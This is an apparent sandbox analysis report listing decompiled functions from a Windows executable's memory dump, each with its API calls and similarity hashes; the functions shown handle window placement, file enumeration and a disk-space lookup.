0x0045515b

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,0045515C), ref: 00455058
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045505E

Strings

kernel32.dll, xrefs: 00455053
GetDiskFreeSpaceExA, xrefs: 0045504E

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 5cf265212c98e08974fa2c9ffa44d5e56c15a6230db81482d5f218b41770483f
Instruction ID: 6cd16e2f3334a9298e1a0ee5254b0e49d2338a248bd2fb4c2a62f91a328bc87d
Opcode Fuzzy Hash: 5cf265212c98e08974fa2c9ffa44d5e56c15a6230db81482d5f218b41770483f
Instruction Fuzzy Hash: 49316271A04649AFCF01EFA5C892AEFBBB8EF49704F504566F800F7292D6785D09CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00417CB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417CB8(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void _v64;
				int _t51;
				void* _t52;
				int _t58;
				int _t62;

				_t58 = __ecx;
				_t62 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x24)) || __ecx !=  *((intOrPtr*)(__eax + 0x28)) || _a8 !=  *((intOrPtr*)(__eax + 0x2c))) {
					L4:
					if(E00418360(_t52) == 0 || IsIconic( *(_t52 + 0xc0)) != 0) {
						 *(_t52 + 0x24) = _t62;
						 *(_t52 + 0x28) = _t58;
						 *((intOrPtr*)(_t52 + 0x2c)) = _a8;
						 *((intOrPtr*)(_t52 + 0x30)) = _a4;
						if(E00418360(_t52) != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0xc0),  &_v48);
							E00414644(_t52,  &_v64);
							memcpy( &(_v48.rcNormalPosition),  &_v64, 4 << 2);
							SetWindowPlacement( *(_t52 + 0xc0),  &_v48);
						}
					} else {
						SetWindowPos( *(_t52 + 0xc0), 0, _t62, _t58, _a8, _a4, 0x14);
					}
					return E00414448(_t52);
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x30))) {
						return _t51;
					}
					goto L4;
				}
			}

0x00417cc1
0x00417cc3
0x00417cc5
0x00417cca
0x00417ce5
0x00417cee
0x00417d1c
0x00417d1f
0x00417d25
0x00417d2b
0x00417d37
0x00417d39
0x00417d4b
0x00417d55
0x00417d65
0x00417d72
0x00417d72
0x00417d00
0x00417d15
0x00417d15
0x00000000
0x00417cd9
0x00417cd9
0x00417cdf
0x00417d84
0x00417d84
0x00000000
0x00417cdf

APIs

IsIconic.USER32 ref: 00417CF7
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D15
GetWindowPlacement.USER32(?,0000002C), ref: 00417D4B
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D72

Strings

,, xrefs: 00417D39

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: 313044823fb38f3fa02beead4641d87f4897e07155ed098977559df4b6b69d3c
Instruction ID: 4ba590ad5f6c0082faa53a539b4b44f7335d6320e6e7e16f5c0daa0b31dd7885
Opcode Fuzzy Hash: 313044823fb38f3fa02beead4641d87f4897e07155ed098977559df4b6b69d3c
Instruction Fuzzy Hash: B4214C716002089BCF00EF69D8C1AEA77B8AF48314F15456AFD18EF246D738E944CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00463080 Relevance: 7.6, APIs: 5, Instructions: 129
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00463080(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v5;
				int _v12;
				void* _v16;
				char _v20;
				struct _WIN32_FIND_DATAA _v340;
				char _v344;
				char _v348;
				void* _t87;
				intOrPtr _t101;
				intOrPtr _t107;
				intOrPtr _t110;
				void* _t114;
				void* _t116;
				void* _t117;
				intOrPtr _t118;

				_t116 = _t117;
				_t118 = _t117 + 0xfffffea8;
				_push(__esi);
				_push(__edi);
				_v344 = 0;
				_v348 = 0;
				_v20 = 0;
				_t87 = __edx;
				_t114 = __eax;
				_push(_t116);
				_push(0x46323d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t118;
				_v12 = SetErrorMode(1);
				_push(_t116);
				_push(0x463210);
				_push( *[fs:eax]);
				 *[fs:eax] = _t118;
				if(E00403574(_t87) != 3) {
					L4:
					_v5 = 1;
					E0042C3E4(_t87,  &_v344);
					E0040357C( &_v344, 0x463258);
					_v16 = FindFirstFileA(E00403738(_v344),  &_v340);
					if(_v16 == 0xffffffff) {
						_pop(_t101);
						 *[fs:eax] = _t101;
						_push(0x463217);
						return SetErrorMode(_v12);
					} else {
						_push(_t116);
						_push(0x4631f2);
						_push( *[fs:eax]);
						 *[fs:eax] = _t118;
						do {
							if(E00461AA8( &_v340) != 0) {
								E0040355C( &_v20, 0x104,  &(_v340.cFileName));
								E0042C3E4(_t87,  &_v348);
								E0040357C( &_v348, _v20);
								E00461BE8(_v348,  &_v344);
								E00462B00( *((intOrPtr*)(_a4 - 4)), _v20, _t114, 0, _v344);
							}
						} while (FindNextFileA(_v16,  &_v340) != 0);
						_pop(_t107);
						 *[fs:eax] = _t107;
						_push(0x4631f9);
						return FindClose(_v16);
					}
				} else {
					if(E00461ED8(_t87, __edi, _t114) != 0) {
						E00461BE8(_t87,  &_v344);
						E00463478( *((intOrPtr*)(_a4 - 4)), _v344, _t114);
						goto L4;
					} else {
						_v5 = 0;
						E004031BC();
						_pop(_t110);
						 *[fs:eax] = _t110;
						_push(0x463244);
						E00403420( &_v348, 2);
						return E00403400( &_v20);
					}
				}
			}

0x00463081
0x00463083
0x0046308a
0x0046308b
0x0046308e
0x00463094
0x0046309a
0x0046309d
0x0046309f
0x004630a3
0x004630a4
0x004630a9
0x004630ac
0x004630b6
0x004630bb
0x004630bc
0x004630c1
0x004630c4
0x004630d1
0x0046310c
0x0046310c
0x0046311f
0x0046312f
0x00463145
0x0046314c
0x004631fb
0x004631fe
0x00463201
0x0046320f
0x00463152
0x00463154
0x00463155
0x0046315a
0x0046315d
0x00463160
0x0046316d
0x0046317d
0x0046318a
0x00463198
0x004631a9
0x004631c2
0x004631c2
0x004631d7
0x004631dd
0x004631e0
0x004631e3
0x004631f1
0x004631f1
0x004630d3
0x004630dc
0x004630f4
0x00463107
0x00000000
0x004630de
0x004630de
0x004630e2
0x00463219
0x0046321c
0x0046321f
0x0046322f
0x0046323c
0x0046323c
0x004630dc

APIs

SetErrorMode.KERNEL32(00000001,00000000,0046323D), ref: 004630B1
FindFirstFileA.KERNEL32(00000000,?,00000000,00463210,?,00000001,00000000,0046323D), ref: 00463140
FindNextFileA.KERNEL32(000000FF,?,00000000,004631F2,?,00000000,?,00000000,00463210,?,00000001,00000000,0046323D), ref: 004631D2
FindClose.KERNEL32(000000FF,004631F9,004631F2,?,00000000,?,00000000,00463210,?,00000001,00000000,0046323D), ref: 004631EC

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Find$File$CloseErrorFirstModeNext
String ID:
API String ID: 4011626565-0
Opcode ID: ba354bf8eab5c0fe4780bfbea92e7dbfe641c35087c3301d3d94d20a7f43cfef
Instruction ID: 51d011e3085209f7c5c020f5fea4c8b8a4008406e7ff7f86e47956500c51889f
Opcode Fuzzy Hash: ba354bf8eab5c0fe4780bfbea92e7dbfe641c35087c3301d3d94d20a7f43cfef
Instruction Fuzzy Hash: 63418334A006589FCB11EFA5CC55ADEB7B8EB89705F4044BAF404AB351E63C9E488E19

Uniqueness

Uniqueness Score: -1.00%

Function 004634FC Relevance: 7.6, APIs: 5, Instructions: 129
fileCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004634FC(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				int _v12;
				void* _v16;
				char _v20;
				struct _WIN32_FIND_DATAA _v340;
				char _v344;
				char _v348;
				void* _t55;
				void* _t90;
				intOrPtr _t102;
				intOrPtr _t105;
				void* _t113;
				void* _t116;
				void* _t118;
				void* _t120;
				void* _t121;
				intOrPtr _t122;

				_t91 = __ecx;
				_t120 = _t121;
				_t122 = _t121 + 0xfffffea8;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v344 = 0;
				_v348 = 0;
				_v8 = 0;
				_v20 = 0;
				_t116 = __ecx;
				_t90 = __edx;
				_t118 = __eax;
				_push(_t120);
				_push(0x4636e3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t122;
				_t123 = __ecx;
				if(__ecx != 0) {
					E0042C8F8(__ecx, __ecx,  &_v344);
					_push(_v344);
					E0042C3E4(_t90,  &_v348);
					_pop(_t113);
					if(E0042C5AC(_v348, _t90, _t91, _t113, _t116, _t118, _t123) == 0) {
						E0042C8D0(_t116, _t91,  &_v8);
					}
				}
				_v12 = SetErrorMode(1);
				_push(_t120);
				_push(0x4636ae);
				_push( *[fs:eax]);
				 *[fs:eax] = _t122;
				E0042C3E4(_t90,  &_v344);
				E0040357C( &_v344, 0x4636fc);
				_v16 = FindFirstFileA(E00403738(_v344),  &_v340);
				if(_v16 == 0xffffffff) {
					__eflags = 0;
					_pop(_t102);
					 *[fs:eax] = _t102;
					_push(0x4636b5);
					return SetErrorMode(_v12);
				} else {
					_push(_t120);
					_push(0x463690);
					_push( *[fs:eax]);
					 *[fs:eax] = _t122;
					do {
						_t55 = E00461AA8( &_v340);
						_t127 = _t55;
						if(_t55 != 0) {
							E0040355C( &_v20, 0x104,  &(_v340.cFileName));
							if(E0042C5AC(_v20, _t90, 0x104, _v8, _t116, _t118, _t127) != 0 && E00462BE8( *((intOrPtr*)(_a4 - 4)), _v20, _t118) == 0) {
								E0042C3E4(_t90,  &_v348);
								E0040357C( &_v348, _v20);
								E00461BE8(_v348,  &_v344);
								E00462B00( *((intOrPtr*)(_a4 - 4)), _v20, _t118, 0, _v344);
							}
						}
					} while (FindNextFileA(_v16,  &_v340) != 0);
					_pop(_t105);
					 *[fs:eax] = _t105;
					_push(0x463697);
					return FindClose(_v16);
				}
			}

0x004634fc
0x004634fd
0x004634ff
0x00463505
0x00463506
0x00463507
0x0046350a
0x00463510
0x00463516
0x00463519
0x0046351c
0x0046351e
0x00463520
0x00463524
0x00463525
0x0046352a
0x0046352d
0x00463530
0x00463532
0x0046353c
0x00463547
0x00463550
0x0046355b
0x00463563
0x0046356a
0x0046356a
0x00463563
0x00463576
0x0046357b
0x0046357c
0x00463581
0x00463584
0x00463596
0x004635a6
0x004635bc
0x004635c3
0x00463697
0x00463699
0x0046369c
0x0046369f
0x004636ad
0x004635c9
0x004635cb
0x004635cc
0x004635d1
0x004635d4
0x004635d7
0x004635dd
0x004635e2
0x004635e4
0x004635f4
0x00463606
0x00463624
0x00463632
0x00463643
0x0046365c
0x0046365c
0x00463606
0x00463671
0x0046367b
0x0046367e
0x00463681
0x0046368f
0x0046368f

APIs

SetErrorMode.KERNEL32(00000001,00000000,004636E3), ref: 00463571
FindFirstFileA.KERNEL32(00000000,?,00000000,004636AE,?,00000001,00000000,004636E3), ref: 004635B7
FindNextFileA.KERNEL32(000000FF,?,00000000,00463690,?,00000000,?,00000000,004636AE,?,00000001,00000000,004636E3), ref: 0046366C
FindClose.KERNEL32(000000FF,00463697,00463690,?,00000000,?,00000000,004636AE,?,00000001,00000000,004636E3), ref: 0046368A

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Find$File$CloseErrorFirstModeNext
String ID:
API String ID: 4011626565-0
Opcode ID: b2f692b04d7c9733582fe356902dbe402c1a1863c887719a5fb272b1136e7148
Instruction ID: e3e7d7d146f39441d275d713e2300d04520d9181d0f834714dcddbf087e38057
Opcode Fuzzy Hash: b2f692b04d7c9733582fe356902dbe402c1a1863c887719a5fb272b1136e7148
Instruction Fuzzy Hash: 31416334A00658AFCB10EF65CC859DEB7B9EB88315F4044AAF804E7351E6389F448E59

Uniqueness

Uniqueness Score: -1.00%

Function 0042E780 Relevance: 7.6, APIs: 5, Instructions: 50
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0042E780(void* __eax, void* __ecx, void* __edx) {
				long _v16;
				signed int _t13;
				long _t16;
				signed int _t19;
				void* _t25;

				_t25 = CreateFileA(E00403738(__eax), 0xc0000000, 1, 0, 3, 0x2000000, 0);
				if(_t25 == 0xffffffff) {
					_t19 = 0;
				} else {
					_t13 = DeviceIoControl(_t25, 0x9c040, 0x498790, 2, 0, 0,  &_v16, 0);
					asm("sbb eax, eax");
					_t19 =  ~( ~_t13);
					_t16 = GetLastError();
					CloseHandle(_t25);
					SetLastError(_t16);
				}
				return _t19;
			}

0x0042e7a7
0x0042e7ac
0x0042e7ef
0x0042e7ae
0x0042e7cd
0x0042e7d4
0x0042e7d8
0x0042e7da
0x0042e7e2
0x0042e7e8
0x0042e7e8
0x0042e7f7

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045229F,00000000,004522C0), ref: 0042E7A2
DeviceIoControl.KERNEL32 ref: 0042E7CD
GetLastError.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000), ref: 0042E7DA
CloseHandle.KERNEL32(00000000,00000000,0009C040,?,00000002,00000000,00000000,?,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000), ref: 0042E7E2
SetLastError.KERNEL32(00000000,00000000,00000000,0009C040,?,00000002,00000000,00000000,?,00000000,00000000,C0000000,00000001,00000000,00000003,02000000), ref: 0042E7E8

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast$CloseControlCreateDeviceFileHandle
String ID:
API String ID: 1177325624-0
Opcode ID: 2575b24a487bd9c60359ed98a2ddbf115c0fddf5915b768deb900ebedde3cc1d
Instruction ID: 65b738c2e8fcf112644c65c0370d7c2478d80d9d3fed66bb8c9c92dcd2a8bb58
Opcode Fuzzy Hash: 2575b24a487bd9c60359ed98a2ddbf115c0fddf5915b768deb900ebedde3cc1d
Instruction Fuzzy Hash: 66F090713917203AF620B17A6C87F7B418CC7C5B68F20823ABB04FF1C1D9A85D05566D

Uniqueness

Uniqueness Score: -1.00%

Function 00481878 Relevance: 6.0, APIs: 4, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00481878(signed int __eax) {
				signed int _t8;
				intOrPtr _t9;
				intOrPtr _t10;
				void* _t11;
				intOrPtr _t12;
				intOrPtr _t15;
				intOrPtr _t18;
				intOrPtr _t21;
				signed int _t24;
				void* _t25;

				_t8 = __eax;
				_t24 = __eax;
				if( *0x49b048 != 0) {
					_t9 =  *0x49b048; // 0x22877c0
					_t8 = E00418360(_t9);
					if(_t8 != 0) {
						_t10 =  *0x49b048; // 0x22877c0
						if( *((char*)(_t10 + 0xc7)) == 0 ||  *((char*)(_t24 + 0x1b9)) != 0) {
							L5:
							_t11 = 0;
						} else {
							_t21 =  *0x49a628; // 0x2262410
							if(IsIconic( *(_t21 + 0x20)) == 0) {
								_t11 = 1;
							} else {
								goto L5;
							}
						}
						_t25 = _t11;
						_t12 =  *0x49b048; // 0x22877c0
						_t8 = GetWindowLongA(E004181C8(_t12), 0xfffffff0) & 0xffffff00 | (_t14 & 0x10000000) != 0x00000000;
						if(_t25 != _t8) {
							if(_t25 == 0) {
								_t15 =  *0x49b048; // 0x22877c0
								return ShowWindow(E004181C8(_t15), 0);
							}
							_t18 =  *0x49b048; // 0x22877c0
							return ShowWindow(E004181C8(_t18), 5);
						}
					}
				}
				return _t8;
			}

0x00481878
0x00481879
0x00481882
0x00481888
0x0048188d
0x00481894
0x00481896
0x004818a2
0x004818bf
0x004818bf
0x004818ad
0x004818ad
0x004818bd
0x004818c3
0x00000000
0x00000000
0x00000000
0x004818bd
0x004818c5
0x004818c9
0x004818de
0x004818e3
0x004818e7
0x004818ff
0x00000000
0x0048190a
0x004818eb
0x00000000
0x004818f6
0x004818e3
0x00481894
0x00481910

APIs

IsIconic.USER32 ref: 004818B6
GetWindowLongA.USER32 ref: 004818D4
ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049B048,00480FD2,00481006,00000000,00481026,?,?,00000001,0049B048), ref: 004818F6
ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049B048,00480FD2,00481006,00000000,00481026,?,?,00000001,0049B048), ref: 0048190A

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$Show$IconicLong
String ID:
API String ID: 2754861897-0
Opcode ID: 067afcea2d6ac4c5c16c8fa3ffec3e60ae2b2dc2dfb0d1ed73204545109cf916
Instruction ID: 164b5435562b59e9214fd0687e1a2fb6042f3c4fdfd765628f65074261dbbca4
Opcode Fuzzy Hash: 067afcea2d6ac4c5c16c8fa3ffec3e60ae2b2dc2dfb0d1ed73204545109cf916
Instruction Fuzzy Hash: EB015E706443449BE610B7259D86B5B379AAB20355F08087BF8549B2B3DB2D8C86D74C

Uniqueness

Uniqueness Score: -1.00%

Function 00461AF4 Relevance: 4.6, APIs: 3, Instructions: 67
fileCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00461AF4(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				char _v5;
				void* _v12;
				struct _WIN32_FIND_DATAA _v332;
				char _v336;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t52;
				void* _t53;
				intOrPtr _t54;

				_t52 = _t53;
				_t54 = _t53 + 0xfffffeb4;
				_v336 = 0;
				_push(_t52);
				_push(0x461bc8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t54;
				_v5 = 0;
				E0042C3E4(__eax,  &_v336);
				E0040357C( &_v336, 0x461be4);
				_v12 = FindFirstFileA(E00403738(_v336),  &_v332);
				if(_v12 == 0xffffffff) {
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(0x461bcf);
					return E00403400( &_v336);
				} else {
					_push(_t52);
					_push(0x461ba8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t54;
					while(E00461AA8( &_v332) == 0) {
						if(FindNextFileA(_v12,  &_v332) != 0) {
							continue;
						}
						L5:
						_pop(_t48);
						 *[fs:eax] = _t48;
						_push(0x461baf);
						return FindClose(_v12);
						goto L7;
					}
					_v5 = 1;
					goto L5;
				}
				L7:
			}

0x00461af5
0x00461af7
0x00461b02
0x00461b0c
0x00461b0d
0x00461b12
0x00461b15
0x00461b18
0x00461b2b
0x00461b3b
0x00461b51
0x00461b58
0x00461bb1
0x00461bb4
0x00461bb7
0x00461bc7
0x00461b5a
0x00461b5c
0x00461b5d
0x00461b62
0x00461b65
0x00461b68
0x00461b8f
0x00000000
0x00000000
0x00461b91
0x00461b93
0x00461b96
0x00461b99
0x00461ba7
0x00000000
0x00461ba7
0x00461b77
0x00000000
0x00461b77
0x00000000

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,00461BC8), ref: 00461B4C
FindNextFileA.KERNEL32(000000FF,?,00000000,00461BA8,?,00000000,?,00000000,00461BC8), ref: 00461B88
FindClose.KERNEL32(000000FF,00461BAF,00461BA8,?,00000000,?,00000000,00461BC8), ref: 00461BA2

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: e2b3a8f1c9be68032bfcc0a8779d7b9a41e210ab6effca9d1c1f9602525834f2
Instruction ID: 295f6414b0ac18d21f375fa046b740f49dd63bf5bdd88d17ec308823c3923ea1
Opcode Fuzzy Hash: e2b3a8f1c9be68032bfcc0a8779d7b9a41e210ab6effca9d1c1f9602525834f2
Instruction Fuzzy Hash: 1721D8719046486EDB11DB65CC41ADEBBBCDB49B04F5484F7E808E22B1F638AE44CA59

Uniqueness

Uniqueness Score: -1.00%

Function 004241C4 Relevance: 4.5, APIs: 3, Instructions: 32
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004241C4(void* __eax) {
				struct HWND__* _t10;
				void* _t21;

				_t21 = __eax;
				_t10 = IsIconic( *(__eax + 0x20));
				_t25 = _t10;
				if(_t10 != 0) {
					SetActiveWindow( *(_t21 + 0x20));
					E00423634( *(_t21 + 0x20), 9, _t25);
					E00423AFC(_t21);
					_t10 =  *0x49a62c; // 0x2260660
					_t24 =  *((intOrPtr*)(_t10 + 0x3c));
					if( *((intOrPtr*)(_t10 + 0x3c)) != 0) {
						_t10 = SetFocus(E004181C8(_t24));
					}
					if( *((short*)(_t21 + 0xd6)) != 0) {
						return  *((intOrPtr*)(_t21 + 0xd4))();
					}
				}
				return _t10;
			}

0x004241c6
0x004241cc
0x004241d1
0x004241d3
0x004241d9
0x004241e6
0x004241ed
0x004241f2
0x004241f7
0x004241fc
0x00424206
0x00424206
0x00424213
0x00000000
0x0042421d
0x00424213
0x00424225

APIs

IsIconic.USER32 ref: 004241CC
SetActiveWindow.USER32(?,?,?,?,0046BA06), ref: 004241D9

Part of subcall function 00423634: ShowWindow.USER32(00410638,00000009,?,00000000,0041ED8C,00423922,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 0042364F

Part of subcall function 00423AFC: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,02262410,004241F2,?,?,?,?,0046BA06), ref: 00423B37

SetFocus.USER32(00000000,?,?,?,?,0046BA06), ref: 00424206

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$ActiveFocusIconicShow
String ID:
API String ID: 649377781-0
Opcode ID: 0813d656e208765eb4577b429de9ff5a5822faad21b9b01c56935e206671145a
Instruction ID: 2e17e55d4d49f577383169e840a99395ce9ac4d02c6205d7e93ced2c410d8cb1
Opcode Fuzzy Hash: 0813d656e208765eb4577b429de9ff5a5822faad21b9b01c56935e206671145a
Instruction Fuzzy Hash: 1DF03071B0011087CB10EFBAA8C5B9662A8AF08305B5500BBBC04DF35BCABCDC018768

Uniqueness

Uniqueness Score: -1.00%

Function 00417CB6 Relevance: 3.0, APIs: 2, Instructions: 49
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417CB6(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void _v64;
				int _t34;
				void* _t52;
				int _t60;
				int _t66;

				_t60 = __ecx;
				_t66 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x24)) || __ecx !=  *((intOrPtr*)(__eax + 0x28)) || _a8 !=  *((intOrPtr*)(__eax + 0x2c))) {
					L5:
					if(E00418360(_t52) == 0 || IsIconic( *(_t52 + 0xc0)) != 0) {
						 *(_t52 + 0x24) = _t66;
						 *(_t52 + 0x28) = _t60;
						 *((intOrPtr*)(_t52 + 0x2c)) = _a8;
						 *((intOrPtr*)(_t52 + 0x30)) = _a4;
						if(E00418360(_t52) != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0xc0),  &_v48);
							E00414644(_t52,  &_v64);
							memcpy( &(_v48.rcNormalPosition),  &_v64, 4 << 2);
							SetWindowPlacement( *(_t52 + 0xc0),  &_v48);
						}
					} else {
						SetWindowPos( *(_t52 + 0xc0), 0, _t66, _t60, _a8, _a4, 0x14);
					}
					_t34 = E00414448(_t52);
				} else {
					_t34 = _a4;
					if(_t34 !=  *((intOrPtr*)(__eax + 0x30))) {
						goto L5;
					}
				}
				return _t34;
			}

0x00417cc1
0x00417cc3
0x00417cc5
0x00417cca
0x00417ce5
0x00417cee
0x00417d1c
0x00417d1f
0x00417d25
0x00417d2b
0x00417d37
0x00417d39
0x00417d4b
0x00417d55
0x00417d65
0x00417d72
0x00417d72
0x00417d00
0x00417d15
0x00417d15
0x00417d79
0x00417cd9
0x00417cd9
0x00417cdf
0x00000000
0x00000000
0x00417cdf
0x00417d84

APIs

IsIconic.USER32 ref: 00417CF7
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D15
GetWindowPlacement.USER32(?,0000002C), ref: 00417D4B
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D72

Memory Dump Source

